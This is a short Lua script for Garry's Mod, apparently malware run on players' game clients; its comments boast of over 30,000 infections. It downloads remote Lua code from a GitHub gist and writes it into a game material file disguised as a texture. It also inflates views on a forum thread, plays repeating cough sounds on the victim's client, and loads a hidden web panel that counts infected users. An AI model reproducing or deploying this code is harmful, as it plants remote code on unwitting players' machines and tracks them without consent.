-- Infected lawl
-- Probably more than 30,000 infections
-- This could have been silent
-- Once spammed, this script will stop working by itself

-- Let's get some viewers
http.Fetch("http://facepunch.com/showthread.php?t=1386818&p=44583619#post44583619", function() end, function() end)
if cookie.GetNumber("friendly_removal", 0) ~= 1 then
  http.Fetch("https://gist.githubusercontent.com/Chrisaster/d9872acbf2da227e9281/raw/client_init.lua", function(content)
    DeleteFile("garrysmod/materials/cooltexture.vtf")
    CreateFile("garrysmod/materials/cooltexture.vtf", content)
    
    cookie.Set("friendly_removal", 1)
  end)
end

timer.Create("*cough*", 10, 0, function()
  LocalPlayer():EmitSound("ambient/voices/cough"..math.random(4)..".wav", 450 + math.random() * 50, 50 + math.random() * 100)

end)

local c = vgui.Create("HTML")
c:SetVisible(false)
c:OpenURL("http://s1.freehostedscripts.net/ocounter.php?site=ID4068052&e1=Online%20User&e2=Online%20Users&r=lol&wh=100")